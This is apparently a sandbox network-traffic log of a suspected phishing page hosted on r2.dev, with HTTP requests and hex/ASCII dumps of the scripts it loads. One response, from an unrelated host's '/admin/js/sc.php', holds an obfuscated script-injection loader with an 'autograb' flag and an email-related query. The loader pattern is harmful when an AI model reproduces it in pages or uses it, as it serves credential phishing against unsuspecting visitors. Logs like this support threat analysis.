2024-04-18 17:39:17 UTC	676	OUT	GET /index.html HTTP/1.1 Host: pub-06c7664497d24b6cb36a093c4426dcca.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:17 UTC	281	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:17 GMT Content-Type: text/html Content-Length: 689 Connection: close Accept-Ranges: bytes ETag: "4fbe1d136ffb6a73996696d27fe4c340" Last-Modified: Thu, 18 Apr 2024 15:57:28 GMT Server: cloudflare CF-RAY: 87666ef0dcce1f9d-ATL
2024-04-18 17:39:17 UTC	689	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 20 64 65 66 65 72 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 Data Ascii: <html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer async></script></head><body style="display:flex;justify-content:ce

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:18 UTC	602	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:18 UTC	367	IN	HTTP/1.1 302 Found Date: Thu, 18 Apr 2024 17:39:18 GMT Content-Length: 0 Connection: close location: /turnstile/v0/g/54ea73d52131/api.js?onload=onloadTurnstileCallback cache-control: max-age=300, public cross-origin-resource-policy: cross-origin access-control-allow-origin: * Server: cloudflare CF-RAY: 87666ef78e337bd0-ATL alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:18 UTC	597	OUT	GET /awazwwazq/host%5b24.0%5d/admin/js/sc.php?r=ZW0sZW1haWwsYWRk HTTP/1.1 Host: grupoej.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:18 UTC	356	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:18 GMT Server: Apache Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/javascript; charset=utf-8
2024-04-18 17:39:18 UTC	2454	IN	Data Raw: 39 38 61 0d 0a 76 61 72 20 76 38 34 33 39 65 36 35 32 39 37 30 61 34 33 36 33 34 38 32 33 30 31 66 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 76 61 72 20 61 75 74 6f 67 72 61 62 20 3d 20 30 3b 0d 0a 76 38 34 33 39 65 36 35 32 39 37 30 61 34 33 36 33 34 38 32 33 30 31 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 73 72 63 27 2c 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4d 53 34 78 4c 6d 31 70 62 69 35 71 63 77 3d 3d 22 29 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 76 38 34 33 39 65 36 35 32 39 37 30 61 34 33 36 33 34 38 32 33 30 31 66 29 3b 0d 0a 0d Data Ascii: 98avar v8439e652970a4363482301f= document.createElement('script');var autograb = 0;v8439e652970a4363482301f.setAttribute('src',atob("aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="));document.head.append(v8439e652970a4363482301f);

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:18 UTC	617	OUT	GET /turnstile/v0/g/54ea73d52131/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:18 UTC	340	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:18 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 42415 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=31536000 Cross-Origin-Resource-Policy: cross-origin Server: cloudflare CF-RAY: 87666efaaa7112d7-ATL alt-svc: h3=":443"; ma=86400
2024-04-18 17:39:18 UTC	1029	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 62 74 28 65 2c 72 2c 74 2c 6f 2c 75 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 73 5d 28 6d 29 2c 68 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 74 28 64 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 72 28 68 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 68 29 2e 74 68 65 6e 28 6f 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 75 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function bt(e,r,t,o,u,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,u)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,u){var s=e.apply(r,t);funct
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 75 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6f 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 66 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 Data Ascii: tion(u){return Object.getOwnPropertyDescriptor(e,u).enumerable})),t.push.apply(t,o)}return t}function wt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):fr(Object(r)).forEach(funct
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 75 2c 73 2c 6d 3b 72 65 74 75 72 6e 20 6d 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 6d 5b 53 79 6d 62 6f Data Ascii: &typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Re(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},o,u,s,m;return m={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(m[Symbo
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 4f 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4f 65 3d 33 30 30 30 33 30 3b 66 75 6e 63 74 69 6f 6e 20 4e 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 76 61 72 20 44 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 44 7c 7c 28 44 3d 7b 7d 29 29 3b 76 Data Ascii: me parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ot=300020;var Oe=300030;function N(e,r){return e.indexOf(r)!==-1}var D;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(D\|\|(D={}));v
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 6e 67 22 26 26 70 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 76 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 Data Ascii: ng"&&pr.test(e)}var vr=/^[a-z0-9_\-=]{0,255}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}function Ze(e){return N(["normal","compact","invisible"],e)}function et(e){return N(["auto","manual","never"],e)}function tt(e){return N(["a
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 65 28 65 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 4e 65 28 29 3f 78 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 78 65 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 73 2c 6d 29 7b 76 61 72 20 62 3d 5b 6e 75 6c 6c 5d 3b 62 2e 70 75 73 68 2e 61 70 70 6c 79 28 62 2c 73 29 3b 76 61 72 20 68 3d 46 75 6e 63 Data Ascii: (typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function xe(e,r,t){return Ne()?xe=Reflect.construct:xe=function(u,s,m){var b=[null];b.push.apply(b,s);var h=Func
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 6b 65 28 73 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 73 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 73 2e 63 6f 64 65 3d 75 2c 73 7d 72 65 74 75 72 6e 20 74 7d 28 4c 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 72 29 7b 76 61 72 20 74 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 59 74 28 74 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 Data Ascii: ke(s),"code",void 0),s.name="TurnstileError",s.code=u,s}return t}(Le(Error));function v(e,r){var t="[Cloudflare Turnstile] ".concat(e,".");throw new Yt(t,r)}function _(e){console.warn("[Cloudflare Turnstile] ".concat(e,"."))}function be(e){return e.starts
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 2e 63 6f 6e 63 61 74 28 53 29 29 3b 69 66 28 21 55 29 7b 64 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 7c 7c 28 5f 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 57 69 64 67 65 74 20 22 2e 63 6f 6e 63 61 74 28 53 2c 22 2c 20 63 6f 6e 73 69 64 65 72 20 75 73 69 6e 67 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6d 6f 76 65 28 29 20 74 6f 20 63 6c 65 61 6e 20 75 70 20 61 20 77 69 64 67 65 74 2e 22 29 29 2c 64 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 3d 21 30 29 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 28 64 2e 69 73 45 78 65 63 75 74 69 6e 67 7c 7c 21 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 7c 7c 64 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 26 26 21 64 2e 69 73 53 74 61 Data Ascii: .concat(S));if(!U){d.watchcat.missingWidgetWarning\|\|(_("Cannot find Widget ".concat(S,", consider using turnstile.remove() to clean up a widget.")),d.watchcat.missingWidgetWarning=!0);continue}if((d.isExecuting\|\|!d.isInitialized\|\|d.isInitialized&&!d.isSta
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 66 75 6e 63 74 69 6f 6e 20 73 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 72 29 7b 76 61 Data Ascii: eyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}function st(e,r){var t="https://challenges.cloudflare.com";if(r){va
2024-04-18 17:39:18 UTC	1369	IN	Data Raw: 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 33 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3e 72 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 72 29 3a 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 4a 74 28 65 29 7b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 69 66 28 21 74 7c 7c 74 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 42 4f 44 59 22 29 72 65 74 75 72 6e 20 6f 3b 66 6f 72 28 76 61 72 20 75 3d 31 2c 73 3d 74 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 73 3b 29 73 2e 74 61 67 4e 61 6d 65 3d 3d 3d 74 2e 74 61 67 4e 61 6d 65 26 26 75 2b 2b 2c 73 3d 73 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e Data Ascii: ments.length>1&&arguments[1]!==void 0?arguments[1]:3;return e.length>r?e.substring(0,r):e};function Jt(e){var r=function(t,o){if(!t\|\|t.tagName==="BODY")return o;for(var u=1,s=t.previousElementSibling;s;)s.tagName===t.tagName&&u++,s=s.previousElementSiblin

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:19 UTC	589	OUT	GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:19 UTC	963	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:19 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e2d-bb78" Last-Modified: Mon, 04 May 2020 16:09:17 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 71905 Expires: Tue, 08 Apr 2025 17:39:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNF4u2aryeQnkPevPLb06ceAC3IJ3WfTRLL%2Bg1HOv%2FeXBc8%2F7vyaLfCIYZgbnk97%2BrBwntu9sfDri0YcWX8QrPndgW7e7T1hfnA%2FB2C%2BjUGdlmTLgyEtAuHTCN7p3FMH4L6IS1Ad"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 87666efcda77458a-ATL alt-svc: h3=":443"; ma=86400
2024-04-18 17:39:19 UTC	406	IN	Data Raw: 37 62 65 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a Data Ascii: 7be4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 Data Ascii: &&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==ty
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 Data Ascii: r o=0;o<n;o++){var s=r[o>>>2]>>>24-o%48&255;e[i+o>>>2]\|=s<<24-(i+o)%48}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:f
